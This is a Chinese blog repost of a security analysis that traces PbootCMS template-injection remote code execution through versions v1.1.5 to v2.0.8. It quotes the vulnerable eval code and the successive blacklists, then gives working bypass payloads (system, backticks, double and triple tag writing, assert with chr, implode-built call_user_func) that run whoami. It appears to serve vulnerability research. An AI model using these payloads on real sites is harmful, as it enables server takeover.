phpinfo函数无法执行_PbootCMS任意代码执行的前世今生

最新推荐文章于 2024-04-10 08:48:16 发布
最新推荐文章于 2024-04-10 08:48:16 发布
阅读量577 收藏 1
点赞数
文章标签: phpinfo函数无法执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39997194/article/details/111653275
版权
a4954eea968492deb053a5d6d4f4cf69.png

PbootCMS (v1.1.5及其以下)

漏洞复现

6d04a64291c676bc39078c83ea03847d.png 
poc:{pboot:if(system(whoami))}{/pboot:if}

漏洞分析

漏洞点位于/apps/home/controller/ParserController.php

    public function parserIfLabel($content)    {        $pattern = '/{pboot:if(([^}]+))}([sS]*?){/pboot:if}/';        $pattern2 = '/pboot:([0-9])+if/';        if (preg_match_all($pattern, $content, $matches)) {            $count = count($matches[0]);            for ($i = 0; $i < $count; $i ++) {                $flag = '';                $out_html = '';                // 对于无参数函数不执行解析工作                if (preg_match('/[w]+()/', $matches[1][$i])) {                    continue;                }                eval('if(' . $matches[1][$i] . '){$flag="if";}else{$flag="else";}');                ......

这里有通过两个正则表达式后即可进入eval函数且$content是可控的第一个正则表达式限制格式格式必须为{pboot:if(payload)}{/pboot:if}形式第二个正则表达式不允许出现字母后面加()的情况,如phpinfo()这里很好绕过,比如phpinfo(1),system(任意命令)

PbootCMS (v1.1.6-v1.1.8)

漏洞分析

从1.1.6对之前存在的任意代码执行漏洞进行了修补,增加了部分函数黑名单,代码如下

public function parserIfLabel($content)    {        $pattern = '/{pboot:if(([^}]+))}([sS]*?){/pboot:if}/';        $pattern2 = '/pboot:([0-9])+if/';        if (preg_match_all($pattern, $content, $matches)) {            // IF语句需要过滤的黑名单            $black = array(                'chr',                'phpinfo',                'eval',                'passthru',                'exec',                'system',                'chroot',                'scandir',                'chgrp',                'chown',                'shell_exec',                'proc_open',                'proc_get_status',                'error_log',                'ini_alter',                'ini_set',                'ini_restore',                'dl',                'pfsockopen',                'syslog',                'readlink',                'symlink',                'popen',                'stream_socket_server',                'putenv',                'unlink',                'path_delete',                'rmdir',                'session',                'cookie',                'mkdir',                'create_dir',                'create_file',                'check_dir',                'check_file'            );            $count = count($matches[0]);            for ($i = 0; $i < $count; $i ++) {                $flag = '';                $out_html = '';                $danger = false;                foreach ($black as $value) {                    if (preg_match('/' . $value . '([s]+)?(/i', $matches[1][$i])) {                        $danger = true;                        break;                    }                }                // 如果有危险字符,则不解析该IF                if ($danger) {                    continue;                }                eval('if(' . $matches[1][$i] . '){$flag="if";}else{$flag="else";}');

显然黑名单有漏网之鱼,但是由于将单引号、双引号都进行了html实体转义让很多函数不能使用,但是依然有可以用的,如base64_decode,反引号等

payload1{pboot:if(1);$a=base64_decode(c3lzdGVt);$a(whoami);//)}{/pboot:if}
8fe4a5244eb9d04319ddf527e7a179d9.png 
payload2{pboot:if(var_dump(`whoami`))}{/pboot:if}
d0135fb099e2fc9447990b5344bcfdfb.png

PbootCMS(v1.1.9-v1.3.2)

发现黑名单有不足于是改成了白名单,代码如下

public function parserIfLabel($content)    {        $pattern = '/{pboot:if(([^}]+))}([sS]*?){/pboot:if}/';        $pattern2 = '/pboot:([0-9])+if/';        if (preg_match_all($pattern, $content, $matches)) {            $count = count($matches[0]);            for ($i = 0; $i < $count; $i ++) {                $flag = '';                $out_html = '';                $danger = false;                $white_fun = array(                    'date'                );                // 不允许执行带有函数的条件语句                if (preg_match_all('/([w]+)([s]+)?(/i', $matches[1][$i], $matches2)) {                    foreach ($matches2[1] as $value) {                        if (function_exists($value) && ! in_array($value, $white_fun)) {                            $danger = true;                            break;                        }                    }                }                // 如果有危险字符,则不解析该IF                if ($danger) {                    continue;                } else {                    $matches[1][$i] = decode_string($matches[1][$i]); // 解码条件字符串                }                eval('if(' . $matches[1][$i] . '){$flag="if";}else{$flag="else";}');                ......

如果我们能绕过function_exists的检测就行了网上有师傅给了如下绕过思路

581f4a365a01548fcaffe169030155a6.png 
payload1{pboot:if(system(whoami));//)}{/pboot:if}
8659554278c725125f4f9770d66a9741.png 
payload2{pboot:if(1);$a=$_GET[cmd];$a(whoami);//)}{/pboot:if}&cmd=system
24f43613e6affaf8226d8901f184ea13.png

后面的版本添加了正则匹配eval,其实也没啥用,上面两个payload一样可以用

PbootCMS(v1.3.3-v2.0.2)

过滤了特殊字符导致使用非交互式直接执行任意代码的时代结束

8e0207923e63944e5624473f50f1a508.png

然而留言部分仍然存在任意代码执行,代码如下

public function parserIfLabel($content)    {        $pattern = '/{pboot:if(([^}]+))}([sS]*?){/pboot:if}/';        $pattern2 = '/pboot:([0-9])+if/';        if (preg_match_all($pattern, $content, $matches)) {            $count = count($matches[0]);            for ($i = 0; $i < $count; $i ++) {                $flag = '';                $out_html = '';                $danger = false;                $white_fun = array(                    'date',                    'in_array',                    'explode',                    'implode'                );                // 还原可能包含的保留内容,避免判断失效                $matches[1][$i] = $this->restorePreLabel($matches[1][$i]);                // 解码条件字符串                $matches[1][$i] = decode_string($matches[1][$i]);                // 带有函数的条件语句进行安全校验                if (preg_match_all('/([w]+)([s]+)?(/i', $matches[1][$i], $matches2)) {                    foreach ($matches2[1] as $value) {                        if ((function_exists($value) || preg_match('/^eval$/i', $value)) && ! in_array($value, $white_fun)) {                            $danger = true;                            break;                        }                    }                }                // 不允许从外部获取数据                if (preg_match('/($_GET[)|($_POST[)|($_REQUEST[)|($_COOKIE[)|($_SESSION[)/i', $matches[1][$i])) {                    $danger = true;                }                // 如果有危险函数,则不解析该IF                if ($danger) {                    continue;                }                eval('if(' . $matches[1][$i] . '){$flag="if";}else{$flag="else";}');

禁止了外部数据的获取,白名单处的正则匹配不严谨,导致函数名+空格+()可以实现绕过

payload{pboot:if(system (whoami))}{/pboot:if}
a661b6a7a07c4db366a7698a8059d25c.png

PbootCMS(v2.0.3)

增加了外部获取数据过滤部分,代码如下

if (preg_match('/($_GET[)|($_POST[)|($_REQUEST[)|($_COOKIE[)|($_SESSION[)|(file_put_contents)|(fwrite)|(phpinfo)|(base64_decode)/i', $matches[1][$i])) {                    $danger = true;                }

并不影响我们使用system函数,提交上一个版本payload,发现pboot:if被删掉了

940f53883fa74971f86e37bc16cc9de2.png

在apps/home/controller/IndexController.php里第270行使用了将pboot:if替换为空

d0135fb099e2fc9447990b5344bcfdfb.png

所以直接双写绕过

payload{pbopboot:ifot:if(system (whoami))}{/pbpboot:ifoot:if}
fbe56176dbc55857c2d730dd3399e731.png

PbootCMS(v2.0.4-v2.0.7)

使用上一个版本payload,发下双写也被过滤了

f046a27ce1f27513ebd471bf32356d9b.png

改动的地方位于/core/basic/Model.php,增加了如下代码

ceef6e4c09467926f4bfb468bbbff4a2.png

也就是再过滤了一次pboot:if,然而这种替换为空是根本没用的,于是三重写绕过,但是v2.0.4还增加了正则黑名单的过滤,禁用了system等函数,代码如下正则匹配黑名单加强,代码如下

if (preg_match('/($_GET[)|($_POST[)|($_REQUEST[)|($_COOKIE[)|($_SESSION[)|(file_put_contents)|(fwrite)|(phpinfo)|(base64_decode)|(`)|(shell_exec)|(eval)|(system)|(exec)|(passthru)/i', $matches[1][$i])) {                    $danger = true;                }

发现漏掉了assert函数,没用过滤chr函数,所以直接拼接绕过

payload{ppbopboot:ifot:ifboot:if(assert (chr (115).chr (121).chr (115).chr (116).chr (101).chr (109).chr (40).chr (119).chr (104).chr (111). chr (97).chr (109).chr (105).chr (41)))}{/pbpbopboot:ifot:ifoot:if}
bedd5389b88dbdcdd7684daa1152fa0c.png

PbootCMS(v2.0.8)

从v2.0.8开始采用递归替换pboot:if,位于/app/home/controller/MessageController.php第61行

$field_data = preg_replace_r('/pboot:if/i', '', $field_data);

跟进一下,位于/core/function/handle.php

function preg_replace_r($search, $replace, $subject){    while (preg_match($search, $subject)) {        $subject = preg_replace($search, $replace, $subject);    }    return $subject;}

这样就无法采用双写绕过了,正则表达式处改动了,导致函数+空格被过滤,代码如下

if (preg_match_all('/([w]+)([s]+)?(/i', $matches[1][$i], $matches2)) {                    foreach ($matches2[1] as $value) {                        if (function_exists($value) && ! in_array($value, $white_fun)) {                            $danger = true;                            break;                        }                    }                }

后台不会经过preg_replace函数的处理,使用的白名单里implode函数仍然可以实现任意代码执行

payload{pboot:if(implode('', ['c','a','l','l','_','u','s','e','r','_','f','u','n','c'])(implode('',['s','y','s','t','e','m']),implode('',['w','h','o','a','m','i'])))}{/pboot:if}
6f603876d2e4a29d324065d030fbb36a.png

后记

PbootCMS的最新版本v3.0.1已经发布修复了该漏洞,从v1.0.1最开始的第一个版本到v2.0.9历时2年经过不断的漏洞修复,但是每次修复后就被绕过,不由得引发一系列反思

本文由ghtwf01原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/212603

weixin_39997194
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpinfo_feathersllf_zip_php_
09-30
just simple php info
PbootCMS search SQL注入漏洞
孤桜懶契
07-13 4571
搜索框页面为 ✅ Payload为 https://gylq.gitee.io/time/
0day PbootCMS-pboot远程命令执行漏洞
最新发布
weixin_43167326的博客
04-10 1309
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。在PbootCMS V3.1.2版本中存在RCE漏洞导致攻击者可利用该漏洞远程执行命令。
cms_vulnerability
04-17
cms_漏洞 PbootCMS-V3.0.4中存在一个漏洞,该漏洞使攻击者可以从中读取敏感信息。 通过查看源代码,我们发现了一个信息泄露漏洞,可以从中读取敏感信息。 复发: 我们访问网址: http://localhost/PbootCMS/?member/login/ 像这样 没问题,但是当我们删除login , 网址: http://localhost/PbootCMS/?member/ 发生了一些错误: Romote Attacker可以读取有关Webroot路径的敏感信息。 当我们访问Url时,会发生同样的事情: http://localhost/PbootCMS/?comment/abc/ 分析源代码 我们可以阅读home / controller / IndexController.php来了解它。 如果$path[1]不是类MemberController(/ap
phph_info_phpinfo_
10-03
phpinfo ok
网安之web攻防第四十四天笔记
B_l_a_nk的博客
05-29 288
1、RCE执行-代码执行&命令执行 2、CTF考点-漏洞配合&绕过手法 3、利用审计-CMS框架&中间件等
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞
Liyu_6618的博客
02-02 1018
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞
暗月渗透实战靶场-项目八(上)
高高同学
02-10 6500
暗月渗透实战靶场-项目八
PbootCMS后台存储型XSS漏*洞复现 CVE-2020-20363
afei001
10-05 1132
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 存在跨站脚本漏洞,该漏洞源于产品的admin.php页面未对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1359
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
一些需要禁用的PHP危险函数(disable_functions)
12-18
phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中 passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高 exec() 功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。 危险等级:高 system() 功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。 危险等级:高 chroot() 功能描述:可改变当前 PHP 进程的工作根目录,仅当系统支持 CLI 模式 PHP 时才能工作,且该函数不适用于 Windows 系统。 危险等级:高 scan
phpinfo 系统查看参数函数代码
10-29
并根据自身的理解做了很多修改和优化,就当前而言,这是探测信息最全面的PHP探针了!
PbootCMS整理13个常用if条件判断语句总结分享,隔行换色,导航高亮,缩略图判断等
a9490489的博客
05-24 1622
PbootCMS整理13个常用if条件判断语句总结分享,隔行换色,导航高亮,缩略图判断等
阿里云提示pbootcms发现后门(Webshell)—Kernel.php文件怎么处理?
weixin_46719548的博客
01-05 2362
pbootcms本身是免费、开源的一套CMS系统,官方也再三强调过免费。所以各位用户不用慌。总之呢,pbootcms有一个核心加密文件。这个加密文件承载了授权码、路由等核心方法。这个加密文件的路径是 /core/basic/Kernel.php,但是呢,由于使用的加密方式等原因,被阿里云判定为了木马文件。最近针对pbootcms的漏洞攻击越来越多,建议大家及时更新pbootcms系统,打好服务器补丁。
PbootCMS XSS漏洞代码审计
afei001
10-05 1275
PbootCMS XSS漏洞代码审计
渗透测试-getshell学习总结
lza20001103的博客
08-26 2083
getshell学习总结 文章目录getshell学习总结一、方法分类1.带有漏洞的应用2.常规漏洞3.后台拿shell二、网站常见getshell方法1.数据库备份拿shell2.上传3.修改允许上传类型4.服务器解析漏洞5.编辑器6. 网站配置插马7.上传插件8.数据库执行9.文件包含10. 命令执行三、常见cms后台拿shell1.dedecms一、后台文件上传二、数据库执行拿shell2.南方数据、良精、动易一、数据库备份(备份图片马、备份数据库)1.上传图片马2.审查元素,找到图片马路径3.开始备
PbootCMS 3.0.4 SQL注入
hongduilanjun的博客
08-28 1049
所以要自己进行 POST请求(1=select 1),请求会被 request函数 处理后赋值给 $where3,然后处理 SQL语句。通过对 search 或 keyword 进行 GET请求 都可以调用 SearchController类 的 index方法。就是,并且data 只能包含中文、字母、数字、横线、点、逗号、空格,然后通过 escape_string函数 进行过滤。页面中的搜索框是对 keyword 进行 GET请求 的,但是如果用 keyword 请求,变量会被销毁。
不是吧,PbootCMS v2.x也有本地文件包含漏洞呀!
一个安全研究员
02-17 2906
通用漏洞奉上
phpinfo函数怎么用
06-10
phpinfo() 函数用于输出 PHP 的当前配置信息,包括 PHP 版本、编译器版本、操作系统信息、已加载的扩展模块、环境变量设置等等。 要使用 phpinfo() 函数,只需要在 PHP 文件中输入以下代码即可: ```php <?php phpinfo(); ?> ``` 当你运行这个文件时,会输出一个完整的 PHP 配置信息页面。如果你只想查看某些配置信息,可以使用 phpinfo() 函数的参数来过滤输出。例如,如果只想查看 PHP 版本信息,可以这样使用: ```php <?php phpinfo(INFO_VERSION); ?> ``` 更多参数可以参考 PHP 官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值